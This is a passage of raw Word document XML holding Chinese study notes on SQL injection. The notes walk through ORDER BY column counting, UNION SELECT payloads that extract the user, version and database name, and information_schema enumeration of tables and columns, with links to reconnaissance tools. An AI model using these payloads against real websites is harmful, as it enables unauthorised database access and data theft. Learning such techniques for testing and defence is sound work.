          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084D4E5C" w14:textId="783B9475" w:rsidR="001D4EC6" w:rsidRPr="001D4EC6" w:rsidRDefault="001D4EC6" w:rsidP="001D4EC6">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D4EC6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>数字型：</w:t>
      </w:r>
      <w:r w:rsidRPr="001D4EC6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> SELECT 列 FROM 表 WHERE 数字型列=值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A64DFE7" w14:textId="20BB3ED9" w:rsidR="001D4EC6" w:rsidRPr="001D4EC6" w:rsidRDefault="001D4EC6" w:rsidP="001D4EC6">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D4EC6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>字符型： SELECT 列 FROM 表 WHERE 字符型列=’值’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADAFFE4" w14:textId="63B3A1F4" w:rsidR="001D4EC6" w:rsidRPr="001D4EC6" w:rsidRDefault="001D4EC6" w:rsidP="00016392">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D4EC6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>搜索型： SELECT * FROM 表 WHERE where 被搜索的列 like ‘%值%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD208FA" w14:textId="0E7B4A38" w:rsidR="00016392" w:rsidRDefault="00016392" w:rsidP="0001639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字符型常常要考虑到</w:t>
      </w:r>
      <w:r w:rsidR="006B774B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>单引号的闭合问题，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CC1E66" w14:textId="77777777" w:rsidR="001E0BE9" w:rsidRDefault="00ED55F0" w:rsidP="00ED55F0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输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1'order by 1#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，页面正常，然后输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1'order by 2#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，依次增加，直到3时出现错误</w:t>
      </w:r>
      <w:r w:rsidR="00B33331">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，说明</w:t>
      </w:r>
      <w:r w:rsidR="008F6F04">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>当前表</w:t>
      </w:r>
      <w:r w:rsidR="00B33331">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>有两</w:t>
      </w:r>
      <w:r w:rsidR="008F6F04">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>列</w:t>
      </w:r>
      <w:r w:rsidR="001A79D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001A79D3">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B33331">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>'union select 1,2#</w:t>
      </w:r>
      <w:r w:rsidR="00334086">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADCF373" w14:textId="76432317" w:rsidR="00783543" w:rsidRPr="00783543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利用内置函数暴出用户名</w:t>
      </w:r>
      <w:r w:rsidRPr="00783543">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> and 1=2 union select 1,user()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0FE4BF" w14:textId="5F7DC032" w:rsidR="00783543" w:rsidRPr="00783543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 w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>利用内置函数暴出数据库版本</w:t>
      </w:r>
      <w:r w:rsidRPr="00783543">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> and 1=2 union select 1,version()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75ECA4E7" w14:textId="77777777" w:rsidR="00A974AA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 w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>利用内置函数暴出数据库名称</w:t>
      </w:r>
      <w:r w:rsidRPr="00783543">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>and 1=2 union select 1,database()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D14C055" w14:textId="4D34995F" w:rsidR="00783543" w:rsidRPr="00783543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/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>暴出表名：and 1=2 union select 1,table_name from information_schema.tables where table_schema=database()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A6F5F1" w14:textId="77777777" w:rsidR="00A974AA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 w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>暴出字段名：</w:t>
      </w:r>
      <w:r w:rsidRPr="00783543">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x64617461（必须是表名的十六进制表示）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EABFF10" w14:textId="127F387E" w:rsidR="00783543" w:rsidRPr="00783543" w:rsidRDefault="00783543" w:rsidP="00783543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783543">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>暴出字段内容：</w:t>
      </w:r>
      <w:r w:rsidRPr="00783543">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>and 1=2 union select 1,字段名 from 表名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B78B626" w14:textId="48043844" w:rsidR="000016C6" w:rsidRDefault="00C47E53" w:rsidP="00DD0F46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报出第一个表：</w:t>
      </w:r>
      <w:r w:rsidR="000D7A8A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00D87E8A" w:rsidRPr="00D87E8A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">select table_name from information_schema.tables where table_schema=database() limit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00D87E8A" w:rsidRPr="00D87E8A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>,1</w:t>
      </w:r>
      <w:r w:rsidR="000D7A8A" w:rsidRPr="00D87E8A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="000D7A8A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>)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改变0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即可查看其他表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1969CCB5" w14:textId="5977DB45" w:rsidR="000D7A8A" w:rsidRDefault="000D7A8A" w:rsidP="00DD0F46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0D7A8A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>group_concat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D87E8A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>select table_name from information_schema.tables where table_schema=database()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7A87BB" w14:textId="47E48A96" w:rsidR="000D7A8A" w:rsidRPr="00680EB3" w:rsidRDefault="000D7A8A" w:rsidP="00C15EB2">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:jc w:val="left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680EB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c</w:t>
      </w:r>
      <w:r w:rsidRPr="00680EB3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>oncat(select table_name from information_schema.tables where table_schema=database())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332F26A5" w14:textId="17786291" w:rsidR="00C15EB2" w:rsidRDefault="00C15EB2" w:rsidP="00DD0F46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报出所有表明</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A57090" w14:textId="239F593C" w:rsidR="0043481D" w:rsidRPr="00680EB3" w:rsidRDefault="00824E71" w:rsidP="00DD0F46">
      <w:pPr>
        <w:jc w:val="left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680EB3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>name=1'  union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 and '%'='</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374DC090" w14:textId="66C3FB46" w:rsidR="000016C6" w:rsidRDefault="000016C6" w:rsidP="001F79A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搜索型注入 </w:t>
      </w:r>
      <w:r w:rsidR="00BD2CC6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>判断</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0864F676" w14:textId="57822838" w:rsidR="000016C6" w:rsidRPr="009331C1" w:rsidRDefault="000016C6" w:rsidP="009331C1">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009331C1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>'and 1=1 and '%'='</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244FC18B" w14:textId="77777777" w:rsidR="000016C6" w:rsidRPr="009331C1" w:rsidRDefault="000016C6" w:rsidP="009331C1">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009331C1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>%' and 1=1--'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C0BF93" w14:textId="77777777" w:rsidR="000016C6" w:rsidRPr="009331C1" w:rsidRDefault="000016C6" w:rsidP="009331C1">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009331C1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>%' and 1=1 and '%'='</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p w14:paraId="4C04EC79" w14:textId="58AC8BD7" w:rsidR="000016C6" w:rsidRPr="000016C6" w:rsidRDefault="000016C6" w:rsidP="00DD0F46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</w:p>
    <w:sectPr w:rsidR="000016C6" w:rsidRPr="0000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F1584" w14:textId="77777777" w:rsidR="00613353" w:rsidRDefault="00613353" w:rsidP="004E64AE">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="33A6C66C" w14:textId="77777777" w:rsidR="00613353" w:rsidRDefault="00613353" w:rsidP="004E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2172" w14:textId="77777777" w:rsidR="00613353" w:rsidRDefault="00613353" w:rsidP="004E64AE">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4E245287" w14:textId="77777777" w:rsidR="00613353" w:rsidRDefault="00613353" w:rsidP="004E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0A83"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D8E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92243"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="32C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AE"/>
    <w:rsid w:val="000016C6"/>
    <w:rsid w:val="00016392"/>
    <w:rsid w:val="000D7A8A"/>
    <w:rsid w:val="001A79D3"/>
    <w:rsid w:val="001D4EC6"/>
    <w:rsid w:val="001E0BE9"/>
    <w:rsid w:val="001F79AD"/>
    <w:rsid w:val="00232420"/>
    <w:rsid w:val="003168E6"/>
    <w:rsid w:val="00334086"/>
    <w:rsid w:val="003B0B15"/>
    <w:rsid w:val="0043481D"/>
    <w:rsid w:val="004449E7"/>
    <w:rsid w:val="0049007D"/>
    <w:rsid w:val="004E64AE"/>
    <w:rsid w:val="00520AA1"/>
    <w:rsid w:val="00553991"/>
    <w:rsid w:val="005B1416"/>
    <w:rsid w:val="005E20DF"/>
    <w:rsid w:val="00613353"/>
    <w:rsid w:val="006376A3"/>
    <w:rsid w:val="006647AF"/>
    <w:rsid w:val="00680EB3"/>
    <w:rsid w:val="006B774B"/>
    <w:rsid w:val="006F3C67"/>
    <w:rsid w:val="00762CD4"/>
    <w:rsid w:val="00783543"/>
    <w:rsid w:val="00786ACA"/>
    <w:rsid w:val="00802C0C"/>
    <w:rsid w:val="00824E71"/>
    <w:rsid w:val="00875CFB"/>
    <w:rsid w:val="00890D47"/>
    <w:rsid w:val="008E47AE"/>
    <w:rsid w:val="008E6A9F"/>
    <w:rsid w:val="008F6F04"/>
    <w:rsid w:val="009331C1"/>
    <w:rsid w:val="0096307A"/>
    <w:rsid w:val="00A34A1E"/>
    <w:rsid w:val="00A379ED"/>
    <w:rsid w:val="00A974AA"/>
    <w:rsid w:val="00AA7AAD"/>
    <w:rsid w:val="00AE613C"/>
    <w:rsid w:val="00B33331"/>
    <w:rsid w:val="00B4667E"/>
    <w:rsid w:val="00BD2CC6"/>
    <w:rsid w:val="00C15EB2"/>
    <w:rsid w:val="00C47E53"/>
    <w:rsid w:val="00C54F30"/>
    <w:rsid w:val="00C95168"/>
    <w:rsid w:val="00CC33A0"/>
    <w:rsid w:val="00D60E39"/>
    <w:rsid w:val="00D85097"/>
    <w:rsid w:val="00D87E8A"/>
    <w:rsid w:val="00DD0F46"/>
    <w:rsid w:val="00E07799"/>
    <w:rsid w:val="00E11FA5"/>
    <w:rsid w:val="00E67694"/>
    <w:rsid w:val="00ED55F0"/>
    <w:rsid w:val="00F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5D2A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{FD13B609-5999-4A2A-A533-C739F84A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24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24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F7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4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24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324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232420"/>
  </w:style>
  <w:style w:type="character" w:styleId="a7">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00232420"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="md-end-block">
    <w:name w:val="md-end-block"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00232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232420"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a9">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00232420"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="md-link">
    <w:name w:val="md-link"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00232420"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="md-softbreak">
    <w:name w:val="md-softbreak"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00232420"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="10">
    <w:name w:val="标题 1 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00E67694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semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00001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F7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links.cn/subdomain/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cdnplanet.com/tools/cdnfinder/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://viewdns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00ls.net/ip.html" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ce.cloud.360.cn/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://toolbar.netcraft.com/site_report?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.threatbook.c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ing.aizha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nsdb.io/zh-cn/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ping.chinaz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t.sh" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.ipip.net/i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闫礼</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>礼 闫</cp:lastModifiedBy>
  <cp:revision>44</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-03-26T12:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-03-31T04:57:00Z</dcterms:modified>
</cp:coreProperties>
</file>